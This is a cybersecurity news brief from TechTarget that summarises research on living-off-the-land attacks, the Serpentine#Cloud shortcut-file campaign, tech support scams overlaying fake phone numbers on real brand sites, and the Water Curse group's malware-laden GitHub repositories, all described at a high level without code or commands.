Getty Images
News brief: LOTL attacks, spoofed sites, malicious repositories
Check out the latest security news from the Informa TechTarget team.
Bitdefender researchers discovered that an overwhelming 84% of major attacks -- rated as those incidents with high severity by the vendor's cybersecurity platform -- use living-off-the-land techniques.
After analysis of more than 700,000 security events logged by the Bitdefender GravityZone platform across 90 days, researchers concluded that adversaries are "demonstrably successful in evading traditional defenses by expertly manipulating the very system utilities we trust and rely on daily -- and threat actors operate with a confident assertion of undetectability."
LOTL attacks aren't new. While the term was coined in 2013, the approach dates back to 2001's Code Red, a worm that ran entirely in memory, didn't download or install any files, and reportedly cost billions in damages.
In a nutshell, LOTL attacks use legitimate software and functions that already exist in victim systems to perform attacks. In the case of Code Red, the worm exploited Microsoft's IIS web server software to conduct DoS attacks. Because they use known and trusted systems, these attacks are often able to hide in the background and evade users, making them difficult to prevent, detect and mitigate.
Once inside a victim's systems, attackers can perform reconnaissance, deploy fileless or memory-only malware, and steal credentials, among other LOTL techniques -- completely unbeknownst to the victim.
This week's roundup highlights a malware campaign that conducts LOTL attacks against Cloudflare Tunnel infrastructure and Python-based loaders. Plus, scammers use legitimate websites to trick victims seeking tech support, and malicious GitHub repositories masquerade as legitimate penetration testing suites.
Serpentine#Cloud uses shortcut files and Cloudflare infrastructure
Researchers at Securonix have identified a sophisticated malware campaign called Serpentine#Cloud that uses LNK shortcut files to deliver remote payloads. Attacks begin with phishing emails containing links to zipped attachments that execute remote code when opened, ultimately deploying a Python-based, in-memory shellcode loader that backdoors systems.
Threat actors use Cloudflare's tunneling service to host the malicious payloads, benefiting from its trusted certificates and use of HTTPS. While showing some sophistication reminiscent of nation-state actors, certain coding choices of these LOTL attacks have suggested that Serpentine#Cloud is likely not from any major nation-state groups.
Scammers hijack search results with fake tech support numbers
Cybercriminals are creating deceptive tech support scams by purchasing sponsored Google ads that appear to represent major brands, including Apple, Microsoft and PayPal. Unlike traditional scams, these attacks direct users to legitimate company websites, but overlay fraudulent support phone numbers. When users call these numbers, scammers pose as official tech support to steal data and financial information or gain remote access to devices.
Malwarebytes researchers called this a "search parameter injection attack," where malicious URLs embed fake phone numbers into genuine sites. Users should verify support numbers through official company communications before calling.
Threat group weaponizes GitHub repositories to target security pros
Trend Micro researchers identified a new threat group called Water Curse that weaponizes GitHub repositories disguised as legitimate security tools to deliver malware through malicious build scripts.
Active since March 2023, the group has used at least 76 GitHub accounts to target cybersecurity professionals, game developers and DevOps teams. The multistage malware can exfiltrate credentials, browser data and session tokens while establishing remote access and persistence. The attack typically begins when victims download compromised open source projects containing embedded malicious code. The code triggers during compilation, deploying VBScript and PowerShell payloads that perform system reconnaissance and data theft.
Read the full story by Elizabeth Montalbano on Dark Reading.
Editor's note: Our staff used AI tools to assist in the creation of this news brief.
Sharon Shea is executive editor of Informa TechTarget's SearchSecurity site.
